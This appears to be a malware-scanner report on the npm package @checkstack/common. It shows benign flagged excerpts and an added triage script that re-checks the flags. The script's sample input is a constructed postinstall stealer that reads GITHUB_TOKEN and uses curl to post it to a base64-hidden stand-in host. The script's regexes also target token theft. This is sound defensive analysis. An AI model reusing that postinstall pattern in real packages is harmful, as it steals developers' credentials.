// npm package
@checkstack/common
Versions: 23
Maintainers: 1
License: Elastic-2.0
First published: 2026-01-09
Publisher: enyineer
Tarball: 114,069 B
AUTO-PUBLISHED · 2 versions indexed · last publish: 2026-06-07
// exfil path
what is read → where it ships
- steals: GitHub PAT
  sends to: (no destination string extracted — payload may be dynamic / obfuscated)
// publisher campaign by enyineer
2 packages caught from this account. This is not an isolated catch: the same publisher published 1 additional package, and the pipeline caught all of them, the shape of a coordinated campaign rather than a one-off. The links below go to the analysis of each sibling catch.
// offending code · @0.15.0 · 2 files flagged
- @0.15.0 · AUTO-PUBLISHED · publisher: enyineer
  heuristic 64/100 · static flags 2 · llm skipped
  new-publisher:25d · mature-package · publisher-multi-name-burst:79 · publisher-version-pump:103 · reads-github-tokens · child-process-spawn
// offending code · 2 files flagged · patterns: 2
--- package/src/plugin-source.ts (excerpt) ---
import { z } from "zod";

// ─────────────────────────────────────────────────────────────────────────────
// PluginSource — discriminated union describing where a plugin came from.
// One installer per `type`. Persisted on the `plugins` row so fresh-instance
// bootstrap and reinstall can recreate the artifact from the same source.
//
// Lives in `@checkstack/common` (not `backend-api`) so it can be referenced
// from contracts (which must remain importable from frontend & common
// packages).
// ─────────────────────────────────────────────────────────────────────────────

export const npmPluginSourceSchema = z.object({
  type: z.literal("npm"),
  packageName: z.string().min(1),
  version: z.string().optional(),
  registry: z.string().url().optional(),
});
export type NpmPluginSource = z.infer<typeof npmPluginSourceSchema>;

export const tarballPluginSourceSchema = z.object({
  type: z.literal("tarball"),
  /**
   * The plugin_artifacts row id. The tarball bytes themselves live in
   * Postgres — only the artifact reference is stored on the `plugins` row.
   * On fresh-instance bootstrap, this is what's used to re-fetch the bytes.
   */
  artifactId: z.string().min(1),
  /** Original filename for display in the UI. */
  filename: z.string().optional(),
});
export type TarballPluginSource = z.infer<typeof tarballPluginSourceSchema>;

export const githubPluginSourceSchema = z.object({
  type: z.literal("github"),
  owner: z.string().min(1),
  repo: z.string().min(1),
  tag: z
  // (excerpt ends here)

--- package/src/transport-client.ts (excerpt) ---
/**
 * Generic transport client interface for remote command execution.
 *
 * Transport strategies (SSH, SNMP, WinRM) implement this interface to provide
 * a consistent abstraction for collectors.
 *
 * @template TCommand - Command type (e.g., string for SSH, OidRequest for SNMP)
 * @template TResult - Result type (e.g., { stdout, stderr, exitCode } for SSH)
 */
export interface TransportClient<TCommand, TResult> {
  /**
   * Execute a command on the remote host.
   * The command and result types are defined by the transport implementation.
   */
  exec(command: TCommand): Promise<TResult>;
}
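The two flagged excerpts are a zod schema and a transport interface whose only method is named exec(); none of the lines shown reads a token or spawns a process, so the two static flags deserve a manual re-check before anyone acts on them. Below is a triage script added for this page; it is not code from @checkstack/common or from the scanning pipeline. It re-runs the two flagged patterns over package source text, requires an actual child_process import before a spawn()/exec() call counts, and decodes base64 literals to recover a destination that a plain URL string search would miss (the report's "no destination string extracted" case). The regexes are an assumed approximation of such heuristics, and the three sample files are constructed: two mirror the report's excerpts, the third is an invented stealer-style postinstall script used only to exercise the rules.

```typescript
// Added example for this page; not code from @checkstack/common or the pipeline.
// Re-checks the report's "reads-github-tokens" and "child-process-spawn" flags
// over package source text and tries to recover an obfuscated destination.
// Rule patterns are assumptions approximating such heuristics.

type Finding = { file: string; line: number; rule: string; detail: string };

// Env vars that commonly hold GitHub credentials, the ghp_/github_pat_ token
// prefixes, and the on-disk credential store. The word "github" alone must not
// match, otherwise every GitHub integration would trigger the rule.
const TOKEN_RE =
  /process\.env\.(GITHUB_TOKEN|GH_TOKEN|GITHUB_PAT)\b|\bghp_[A-Za-z0-9]{20,}|\bgithub_pat_[A-Za-z0-9_]{20,}|\.git-credentials/;
// spawn()/exec() calls only count in a file that actually imports child_process;
// an interface method named exec() is not a process spawn.
const CHILD_PROCESS_IMPORT_RE =
  /require\(\s*["'](node:)?child_process["']\s*\)|from\s+["'](node:)?child_process["']/;
const SPAWN_CALL_RE = /\b(spawn|spawnSync|exec|execSync|execFile|execFileSync)\s*\(/;
// Plain destinations, and base64 literals handed straight to a decoder.
const URL_RE = /https?:\/\/[^\s"'`)]+/;
const B64_LITERAL_RE = /(?:Buffer\.from|atob)\(\s*["']([A-Za-z0-9+/=]{8,})["']/;

// Small base64 decoder so the example does not depend on Buffer or atob typings.
const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
function base64Decode(s: string): string {
  const body = s.replace(/=+$/, "");
  let acc = 0, bits = 0, out = "";
  for (let i = 0; i < body.length; i++) {
    const v = B64.indexOf(body[i]);
    if (v < 0) return ""; // not valid base64; caller treats it as no destination
    acc = ((acc << 6) | v) & 0xffff;
    bits += 6;
    if (bits >= 8) {
      bits -= 8;
      out += String.fromCharCode((acc >> bits) & 0xff);
    }
  }
  return out;
}

function scanFile(file: string, source: string): Finding[] {
  const findings: Finding[] = [];
  const importsChildProcess = CHILD_PROCESS_IMPORT_RE.test(source);
  const lines = source.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    const text = lines[i];
    const line = i + 1;
    if (TOKEN_RE.test(text)) {
      findings.push({ file, line, rule: "reads-github-tokens", detail: text.trim() });
    }
    if (importsChildProcess && SPAWN_CALL_RE.test(text)) {
      findings.push({ file, line, rule: "child-process-spawn", detail: text.trim() });
    }
    const url = URL_RE.exec(text);
    if (url) findings.push({ file, line, rule: "destination", detail: url[0] });
    const b64 = B64_LITERAL_RE.exec(text);
    if (b64) {
      // A URL that only exists after decoding is exactly what a static
      // "destination string" search misses.
      const hidden = URL_RE.exec(base64Decode(b64[1]));
      if (hidden) findings.push({ file, line, rule: "destination-obfuscated", detail: hidden[0] });
    }
  }
  return findings;
}

function triage(files: { [path: string]: string }): Finding[] {
  const out: Finding[] = [];
  for (const path of Object.keys(files)) out.push(...scanFile(path, files[path]));
  return out;
}

// Constructed inputs: the first two mirror the excerpts in the report, the third
// is an invented stealer-style postinstall, NOT something found in the package.
const SAMPLE_FILES: { [path: string]: string } = {
  "package/src/transport-client.ts": [
    "export interface TransportClient<TCommand, TResult> {",
    "  exec(command: TCommand): Promise<TResult>;",
    "}",
  ].join("\n"),
  "package/src/plugin-source.ts": [
    'import { z } from "zod";',
    "export const githubPluginSourceSchema = z.object({",
    '  type: z.literal("github"),',
    "  owner: z.string().min(1),",
    "  repo: z.string().min(1),",
    "});",
  ].join("\n"),
  "package/scripts/postinstall.js": [
    'const { execSync } = require("child_process");',
    'const token = process.env.GITHUB_TOKEN || "";',
    "// destination kept base64-encoded, so a plain URL grep finds nothing",
    'const host = Buffer.from("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=", "base64").toString();',
    "execSync('curl -s -d ' + JSON.stringify(token) + ' ' + host);",
  ].join("\n"),
};

for (const f of triage(SAMPLE_FILES)) {
  console.log(`${f.file}:${f.line} ${f.rule} ${f.detail}`);
}
```

Run against the constructed inputs, the two report excerpts produce no findings and the invented postinstall produces three: the token read, the process spawn, and the decoded destination. The import gate is the design choice worth keeping in any real rule: without it, the `exec()` declaration in `TransportClient` would be counted as a spawn.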
